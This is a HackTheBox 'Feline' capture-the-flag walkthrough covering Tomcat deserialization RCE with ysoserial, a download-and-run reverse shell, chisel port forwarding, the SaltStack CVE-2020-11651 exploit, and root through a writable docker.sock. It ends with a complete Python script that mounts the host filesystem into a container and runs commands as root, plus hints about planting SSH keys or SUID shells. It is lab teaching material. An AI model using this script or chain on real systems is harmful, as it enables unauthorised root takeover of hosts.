HackTheBox - Feline

Rustscan results
I am going to use rustscan today to scan all the ports. It is a fast port scanner that sweeps the full 1-65535 range in seconds, which is noticeably quicker than a full-range nmap scan.

It then hands the discovered ports to nmap to identify the services and version numbers.

Apache Tomcat 9.0.27 is running on port 8080.
Checking out the web server
There is a file upload feature at /service/index.html. The site claims to scan email attachments for viruses.

If we tamper with the upload request, we get the following error.


Apache Tomcat RCE by deserialization
Keeping that error in mind, let's proceed. Searching MITRE's CVE list and Google for Tomcat 9.0.27 vulnerabilities turned up this vulnerability. Read what the bug is and how it was patched. We know where uploaded files land and we control the session cookie, so the conditions to exploit it are met.
Prerequisites (taken from here)
There are a number of prerequisites for this vulnerability to be exploitable.
- The PersistentManager is enabled and it is using a FileStore
- The attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
- There are gadgets in the classpath that can be used for a Java deserialization attack
Creating Payload using ysoserial.jar
We need ysoserial.jar to build the malicious serialized object that we upload to get RCE. The GitHub repo is here and the jar can be downloaded from here.
I will use the CommonsCollections2 gadget chain to generate the Java serialized payload.

Getting Reverse shell
Now that we have code execution, let's turn it into a reverse shell. The CommonsCollections2 chain ends in Runtime.exec(), which tokenises the command on whitespace and runs no shell, so redirections and pipes do not work. We therefore need two payloads: one that downloads the shell script and one that executes it.

Scanning the docker0 interface using nmap (Host Discovery)
The machine has a docker0 interface, so there may be containers on that network worth finding. I will use a static nmap binary to sweep it.


Port scanning on docker container
Host discovery turns up 172.17.0.2, a Docker container running some service. Next I scan its ports with a simple bash script that tries every port.

Ports 4505 and 4506 are the SaltStack salt-master publish and request ports. SaltStack is configuration-management software and a remote execution engine widely used in DevOps. Read more about it over here.
Forwarding ports using chisel
First we need to forward the ports we care about, 4505 and 4506, back to our machine with chisel, since the container is only reachable from the host.
Our Local machine
Victim's machine
To check whether the forwards are up, use netstat (or ss) on our local machine and look for listeners on 4505 and 4506.

Saltstack 3000.1 - Remote Code Execution
The exploit used here targets CVE-2020-11651, an authentication bypass in the salt-master ClearFuncs class: its _send_pub() and _prep_auth_info() methods were reachable without authentication, so anyone who can reach the master's publish and request ports (4505 and 4506) can push jobs to every minion and run code as root on the master. (CVE-2020-28243 is a different bug, a local privilege escalation in salt-minion via command injection in a process name, and it is not what is exploited over these ports.)
Grab the exploit script from here; with 4505 and 4506 already forwarded and listening locally, we can point it at 127.0.0.1 and run it.

Writable docker socket (docker.sock)

Write access to docker.sock means we can talk to the Docker Engine API directly, and whoever controls the Docker daemon effectively has root on the host: we can create a container that bind-mounts the host filesystem and run commands inside it. For that we only need a handful of API endpoints: create a container, start it, and exec into it.
Mounting the root (host) into the container
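The create/start/exec sequence described above, as an added example (my code, not the writeup's and not Docker's own client): it speaks HTTP over the unix socket with only the standard library, asks for a container whose HostConfig.Binds mounts the host's / at /mnt, starts it, and runs a command through chroot /mnt so it executes against the host root. The image name is an assumption (pick one that is already present on the host via GET /images/json), as is the default socket path.

```python
"""Added example, not code from the original writeup or from Docker."""
import http.client
import json
import socket

SOCK = "/var/run/docker.sock"  # assumption: default daemon socket path
IMAGE = "alpine"               # assumption: replace with an image from GET /images/json


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over an AF_UNIX socket; the daemon speaks plain HTTP."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def container_spec(image, host_path="/", mount_at="/mnt", cmd=("sleep", "3600")):
    """Body for POST /containers/create. Binds entries are host:container;
    the sleep keeps the container alive so we can exec into it."""
    return {"Image": image, "Cmd": list(cmd),
            "HostConfig": {"Binds": [f"{host_path}:{mount_at}"]}}


def exec_spec(cmd):
    """Body for POST /containers/{id}/exec."""
    return {"AttachStdout": True, "AttachStderr": True, "Cmd": list(cmd)}


def demux(stream):
    """A non-TTY exec returns output in frames: an 8-byte header (stream
    type, three zero bytes, big-endian payload length) then the payload."""
    out, i = b"", 0
    while i + 8 <= len(stream):
        size = int.from_bytes(stream[i + 4:i + 8], "big")
        out += stream[i + 8:i + 8 + size]
        i += 8 + size
    return out


def api(method, path, body=None):
    """One request to the daemon; returns (status, raw response bytes)."""
    conn = UnixHTTPConnection(SOCK)
    data = None if body is None else json.dumps(body).encode()
    headers = {"Content-Type": "application/json"} if data else {}
    conn.request(method, path, body=data, headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read()


def run_on_host(cmd):
    """Create, start, exec. The container sees the host root at /mnt, so
    `chroot /mnt <cmd>` runs cmd against the host filesystem as root."""
    status, raw = api("POST", "/containers/create", container_spec(IMAGE))
    if status != 201:
        raise RuntimeError(f"create failed: {status} {raw!r}")
    cid = json.loads(raw)["Id"]
    status, _ = api("POST", f"/containers/{cid}/start")
    if status != 204:
        raise RuntimeError(f"start failed: {status}")
    status, raw = api("POST", f"/containers/{cid}/exec",
                      exec_spec(["chroot", "/mnt"] + list(cmd)))
    if status != 201:
        raise RuntimeError(f"exec create failed: {status} {raw!r}")
    eid = json.loads(raw)["Id"]
    _, out = api("POST", f"/exec/{eid}/start", {"Detach": False, "Tty": False})
    return cid, demux(out)


if __name__ == "__main__":
    cid, output = run_on_host(["id"])
    print(cid[:12], output.decode(errors="replace"))
```

Once `id` comes back as uid=0 on the host root, the same call can drop an SSH key into /root/.ssh or set the SUID bit on a shell under /mnt; the writeup reaches the same point with curl against the socket.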
